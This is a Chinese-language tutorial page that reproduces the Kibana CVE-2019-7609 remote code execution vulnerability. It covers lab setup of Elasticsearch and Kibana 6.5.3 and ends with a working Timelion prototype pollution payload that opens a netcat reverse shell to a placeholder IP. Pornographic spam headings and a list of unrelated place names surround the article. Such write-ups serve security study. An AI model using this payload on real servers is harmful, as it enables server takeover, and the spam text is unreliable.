亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析

發布時間:2021-12-10 15:40:21 來源:億速云 閱讀:220 作者:柒染 欄目:大數據

怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。

0x00 簡介


Kibana 是為 Elasticsearch設計的開源分析和可視化平臺。你可以使用 Kibana 來搜索,查看存儲在 Elasticsearch 索引中的數據并與之交互。你可以很容易實現高級的數據分析和可視化,以圖標的形式展現出來。

0x01 漏洞概述


攻擊者利用漏洞可以通過Timelion組件中的JavaScript原型鏈污染攻擊,向Kibana發起相關請求,從而接管所在服務器,在服務器上執行任意命令。

0x02 影響版本


Kibana < 6.6.1

Kibana < 5.6.15

0x03 環境搭建


本來是打算docker搭建的,奈何網絡故障,索性直接kali搭建了

受影響的版本為Kibana < 6.6.0,這里選擇了6.5.3進行搭建,修改虛擬機內存4G以上

1、Elasticsearch安裝

a) 首先去官網下載6.5.3的tar包并解壓

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gztar -zxvf elasticsearch-6.5.3.tar.gz

b) 直接運行即可

cd elasticsearch-6.5.3./bin/elasticsearch

**此處有坑**:

i. es要用非root用戶啟動,否則會報` can not run elasticsearch as root`錯誤。

解決方法:使用非root用戶啟動即可。

ii. 如果前邊是用root用戶下載和解壓的es,直接用普通用戶啟動時會報` AccessDeniedException`錯誤

解決方法:改文件屬主

elk@kali:~$ sudo chown -R ubuntu ~/elasticsearch-6.5.3/

elk@kali:~$ sudo chgrp -R ubuntu ~/elasticsearch-6.5.3/

iii. es需要java支持,由于我是在kali上搭的,所以就沒寫java安裝的過程(kali自帶了openJDK)至于說java怎么裝~emmm,是個好問題,百度去~


本文僅提供JDK網盤下載(公眾號回復JDK

訪問http://127.0.0.1:9200/,長這個樣子就說明es啟動成功了

怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析

2、Kibana安裝

a) 官網下載壓縮包并解壓

wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gztar –zxvf kibana-5.4.3-linux-x86_64.tar.gz

b) 直接運行

cd kibana-5.4.3-linux-x86_64./bin/kibana

搭建成功,激動人心!

看一看版本號,嗯,是存在漏洞的樣子~

怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析

0x04 漏洞利用


漏洞點在Timelion處(名字和Timeline有點像)

直接填入Poc,過程和結果如圖:

怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析

怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析

有種“做飯半小時,吃飯十分鐘”的趕腳······【手動捂臉】

有人可能會說我的payload跟作者那個不一樣呢,我這個就是換了個反彈shell的方法,作者那個不曉得為啥我kali上一彈就崩2333

Poc:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("nc -e /bin/sh xx.xx.xx.xx 4321");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

0x05 修復方式


升級Kibana至新版本

看完上述內容,你們掌握怎么進行Kibana遠程代碼執行CVE-2019-7609漏洞復現的分析的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

诏安县| 桂阳县| 丹江口市| 松江区| 清丰县| 绵阳市| 武陟县| 集安市| 文昌市| 佳木斯市| 深圳市| 绥滨县| 沙河市| 巩义市| 永仁县| 浮山县| 简阳市| 平昌县| 巴青县| 墨江| 阿鲁科尔沁旗| 赤壁市| 即墨市| 长葛市| 商河县| 安阳县| 嘉荫县| 浦城县| 正蓝旗| 巍山| 鹤峰县| 砀山县| 合肥市| 廊坊市| 吐鲁番市| 仁寿县| 蚌埠市| 望谟县| 嘉祥县| 六盘水市| 漳州市|